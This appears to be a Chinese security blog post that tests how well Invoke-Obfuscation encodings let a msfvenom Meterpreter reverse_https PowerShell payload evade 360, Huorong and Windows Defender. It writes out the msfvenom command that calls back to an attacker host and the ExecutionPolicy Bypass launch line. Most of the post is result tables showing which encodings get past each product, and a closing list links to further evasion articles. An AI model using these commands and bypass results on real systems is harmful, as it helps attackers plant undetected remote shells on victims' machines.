微信公众号：乌鸦安全

扫取二维码获取更多信息！

更新时间：2021-05-31

Invoke-Obfuscation下载地址：https://github.com/danielbohannon/Invoke-Obfuscation

参考文档 https://blog.csdn.net/weixin_44216796/article/details/112723993

先说下结果：

Invoke-Obfuscation的Encoding部分方法混淆可以过360和火绒，但是过不了Windows Defender

1. 模块使用

导入模块

Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1

这里注意，一定要写上完整路径，不然会报错

加载模块

Invoke-Obfuscation

支持的加密方法：

• TOKEN支持分部分混淆
  STRING整条命令混淆
  COMPRESS将命令转为单行并压缩，
  ENCODING编码
  LAUNCHER选择执行方式
  

2. msfvenom下msf上线

首先用msfvenom生成一个ps1文件

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1

然后设置监听：

然后回到win10

2.1 360

直接在有360的环境下进行执行（这里不做云查杀和杀毒的操作）

PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1

上线成功。

这里来一次查杀，首先使用按位置查杀

报毒，直接在这个位置关闭，不处理

再运行一次，此时360提示有毒。

2.2 Windows defender

复制到Windows sever2019下，Windows Defender直接杀掉

2.3 火绒

关掉Windows Defender

直接使用火绒扫描，没扫描到。

上线试试：

直接就上线了！！！

2.4 总结

因此在此可以进行如下总结：

msfvenom最新版（2021-05-28安装）生成powershell攻击脚本在静态下的查杀效果：

	火绒	360	Windows Defender
windows 10 64位	未测	❌	未测
windows server 2019 64位	✔️	未测	❌

ps：以上环境都联网状态下

同样

msfvenom最新版（2021-05-28安装）生成powershell攻击脚本在动态执行上线的查杀效果：

	火绒	360	Windows Defender
windows 10 64位	未测	❌	未测
windows server 2019 64位	✔️	未测	❌

ps：以上环境都联网，且均在cmd中执行-ExecutionPolicy Bypass来绕过执行安全策略进行上线。

这里可以看到，360在第一次并不拦截，而且还可以上线，这可能由于我用的是虚拟机，如果是实体机的话，应该会被杀。

3. 混淆大法

设置需要混淆的木马文件路径

 set scriptpath C:\0_poweshell\msf-crow.ps1

4. 第一种混淆 1

encoding选择第一种方法混淆1

将文件输出的out 1.ps1

文件路径：

C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

攻击机开启监听模式：

上线测试：

4.1 360

在360环境下直接运行（生成之后没有杀毒扫描）

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

这里是在cmd命令行下执行PowerShell命令的

-ExecutionPolicy Bypass：绕过执行安全策略，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数，可以绕过任意一个安全保护规则。在渗透测试中，基本每一次运行PowerShell脚本时都要使用这个参数。（参考：https://blog.csdn.net/Eastmount/article/details/115503946）

360下上线成功

但使用360云查杀之后显示报毒：

4.2 windows Defender

windows Defender 直接静态被杀

4.3 火绒

火绒，静态扫描报毒

动态上线失败

4.4 总结

静态查杀

	火绒	360	Windows Defender
windows 10 64位	未测	❌	未测
windows server 2019 64位	❌	未测	❌

全挂。。。

5. 第2种混淆 2

这里先静态测试下：

5.1 火绒

火绒：

5.2 360

360云查杀

5.3 Windows Defender

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	❌	未测	✔️

动态上线能力：

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1

火绒：

静态查杀，动态上线失败

windf：

静态查杀正常，动态上线失败

360：

动态上线失败，而且清除了木马，因此这里360也是静动均查杀了木马

此时对其进行重新调整：

5.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	❌	未测
windows server 2019 64位	❌	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	❌	未测
windows server 2019 64位	❌	未测	❌

6. 第三种方法 3

6.1 360

动态上线测试

再次云查杀

6.2 火绒

6.3 windows Defender

静态正常

动态：失败

6.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	❌	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	❌	未测	❌

7. 第四种方法 4

7.1 360

上线测试

7.2 火绒

动态正常

7.3 windows Defender

静态过了

动态上线失败

7.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	❌

8. 第五种方法 5

现在验证下各种查杀

8.1 360

动态上线

8.2 火绒

8.3 window defender

都报错，那再生成一次，这次报错更多了

8.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	运行报错	未测
windows server 2019 64位	运行报错	未测	运行报错

9. 第6种方法 6

9.1 360

动态上线测试，上线正常

再杀一次，还是正常

9.2 火绒

9.3 window defender

9.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	❌

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	❌

10. 第七种方法 7

10.1 360

动态上线测试，win10下的powershell崩掉，应该是由于字符太大的原因

10.2 火绒

动态上线测试：

10.3 window defender

由于脚本无法在我的win10下测试，这里到winserver2019上进行测试，开启Windows defender防护

上线失败

10.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	❌

11. 第八种方法 8

11.1 360

11.2 火绒

11.3 window defender

11.4 总结

静态查杀能力：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	✔️

动态上线：

	火绒	360	Windows Defender
windows 10 64位	未测	✔️	未测
windows server 2019 64位	✔️	未测	❌

12. 总结

12.1 版本问题

环境：

Windows10 x64 + 360

winserver2019 x64 + 火绒

windows Defender最新版本

12.2 查杀问题

火绒，360，Windows defender均采用联网查杀，其中360采用云杀毒模式

12.3 bypass av能力总结

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果：

	msfvenom最新版（2021-05-28安装）	火绒	360	Windows Defender
windows 10 64位	msfvenom最新版（2021-05-28安装）	未测	❌	未测
windows server 2019 64位	msfvenom最新版（2021-05-28安装）	✔️	未测	❌

	方法1: ASCII	火绒	360	Windows Defender
windows 10 64位	方法1: ASCII	未测	❌	未测
windows server 2019 64位	方法1: ASCII	❌	未测	❌

	方法2: Hex	火绒	360	Windows Defender
windows 10 64位	方法2: Hex	未测	✔️	未测
windows server 2019 64位	方法2: Hex	❌	未测	✔️

	方法3: Octal	火绒	360	Windows Defender
windows 10 64位	方法3: Octal	未测	✔️	未测
windows server 2019 64位	方法3: Octal	❌	未测	✔️

	方法4: Binary	火绒	360	Windows Defender
windows 10 64位	方法4: Binary	未测	✔️	未测
windows server 2019 64位	方法4: Binary	✔️	未测	✔️

	方法5: SecureString (AES)	火绒	360	Windows Defender
windows 10 64位	方法5: SecureString (AES)	未测	✔️	未测
windows server 2019 64位	方法5: SecureString (AES)	✔️	未测	✔️

	方法6: BXOR	火绒	360	Windows Defender
windows 10 64位	方法6: BXOR	未测	✔️	未测
windows server 2019 64位	方法6: BXOR	✔️	未测	❌

	方法7: Special Characters	火绒	360	Windows Defender
windows 10 64位	方法7: Special Characters	未测	✔️	未测
windows server 2019 64位	方法7: Special Characters	✔️	未测	✔️

	方法8: Whitespace	火绒	360	Windows Defender
windows 10 64位	方法8: Whitespace	未测	✔️	未测
windows server 2019 64位	方法8: Whitespace	✔️	未测	✔️

ps：以上环境都联网状态下，360采用云查杀

同样

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的动态上线查杀效果：

	msfvenom最新版（2021-05-28安装）	火绒	360	Windows Defender
windows 10 64位	msfvenom最新版（2021-05-28安装）	未测	❌	未测
windows server 2019 64位	msfvenom最新版（2021-05-28安装）	✔️	未测	❌

	方法1: ASCII	火绒	360	Windows Defender
windows 10 64位	方法1: ASCII	未测	❌	未测
windows server 2019 64位	方法1: ASCII	❌	未测	❌

	方法2: Hex	火绒	360	Windows Defender
windows 10 64位	方法2: Hex	未测	❌	未测
windows server 2019 64位	方法2: Hex	❌	未测	❌

	方法3: Octal	火绒	360	Windows Defender
windows 10 64位	方法3: Octal	未测	✔️	未测
windows server 2019 64位	方法3: Octal	❌	未测	❌

	方法4: Binary	火绒	360	Windows Defender
windows 10 64位	方法4: Binary	未测	✔️	未测
windows server 2019 64位	方法4: Binary	✔️	未测	❌

	方法5: SecureString (AES)	火绒	360	Windows Defender
windows 10 64位	方法5: SecureString (AES)	未测	运行报错	未测
windows server 2019 64位	方法5: SecureString (AES)	运行报错	未测	运行报错

	方法6: BXOR	火绒	360	Windows Defender
windows 10 64位	方法6: BXOR	未测	✔️	未测
windows server 2019 64位	方法6: BXOR	✔️	未测	❌

	方法7: Special Characters	火绒	360	Windows Defender
windows 10 64位	方法7: Special Characters	未测	✔️	未测
windows server 2019 64位	方法7: Special Characters	✔️	未测	❌

	方法8: Whitespace	火绒	360	Windows Defender
windows 10 64位	方法8: Whitespace	未测	✔️	未测
windows server 2019 64位	方法8: Whitespace	✔️	未测	❌

ps：以上环境都联网状态下，360采用云查杀

原文地址：https://mp.weixin.qq.com/s/Nvog8OJZXvPKMqJ8MkwNAQ

Invoke-Obfuscation混淆免杀过360和火绒相关推荐

1. 红队培训班作业 | 免杀过360和火绒 四种方法大对比

   文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...

2. mimikatz免杀过360和火绒

   mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网.也可以通过明文密码或者hash值 ...

3. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...

   Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

4. MSF(3)——apk和exe的加马(过360、火绒)

   本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 工具地址 shielden 520apkhook exe 加马 shellter附加 安装 软件准备 添加后门 杀软测试 加 ...

5. 论中国的软件，360和火绒那个更流氓

   一起本人一直用360安全卫士,一直觉得360就是中国最大的流氓软件.没有质疑的那种.后来发现搜狗输入法,百度管家,腾讯的那个管家.金山.都是特么的流氓.下载一个,出现一家全家桶,就不就是我和你相亲,请 ...

6. Pythonshellcode编码+混淆免杀

   Python免杀shellcode加载器 一.工具介绍 免杀方式: msfvenom生成raw格式的shellcode–>base64–>XOR–>AES, 将python代码缩小并 ...

7. 网络安全进阶篇之免杀（十四章-9）MSF加密壳免杀过360

   文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用MSF生成木马并监听 3.2 免杀过程 3.3 测试 一. 概念 1.1 36 ...

8. 【Windows】Shellcode免杀，过360、火绒、Defender 静态及主防

   Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...

9. Shellcode免杀，过360、火绒、windows-Defender

   shellcode简介 Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代 ...

最新文章

1. Linux运维笔记-文档总结-NFS文件共享（网络文件系统）
2. 用VC6.0遇到的一个问题
3. 第四范式陈雨强获评首届世界人工智能大会云帆奖 | 2020WAIC
4. SharedPreferences基础
5. centos 7.2 mysql 允许_CentOS 7.2 mysql-5.7.17 审计插件安装、开启与设定
6. hdu 1257最少拦截系统（贪心）
7. project euler Problem 52
8. 单元测试工具 unitils
9. mes系统和plc通讯案例_「MES系统 | 应用案例」奥松电子云MES系统项目启动大会顺利召开...
10. 归并算法（Java实现）
11. zblog自动采集伪原创发布
12. Python 树表查找_千树万树梨花开，忽如一夜春风来（二叉排序树、平衡二叉树）
13. 获取QQ音乐排行榜数据
14. 查找单词出现次数（功能加强）
15. 计算机网络大学宿舍组网方案设计,学生公寓组网方案推荐 精品推荐
16. k8s学习-深入理解Pod对象
17. 数据库 “投毒”修复方案
18. STGNN（www 2020）论文总结
19. 科罗拉多矿业大学计算机科学专业,科罗拉多矿业大学专业设置情况_有哪些专业...
20. 激活函数、损失函数和优化函数的比较

热门文章

1. 激光雷达的现状--激光雷达为何蹿红
2. android 10 gsi,【刷机教程】荣耀10 EMUI9刷原生Treble AOSP9 GSI镜像的步骤
3. 《首先，打破一切常规》读后感
4. 函数 内置函数 动态数组 字符
5. 使用python画出五角星
6. SSH 互信配置（ssh-keygen，ssh-copy-id，known_hosts）
7. C++开发人员必备：86本C++教程电子书下载
8. 持续集成与持续部署（六）02-CircleCI——CircleCI配置Node.js应用之.circleciconfig.yml配置文件 deploy.sh文件内容
9. 淘宝登录取Cookie分析
10. 【iOS】APP IM聊天框架的设计（基于第三方SDK）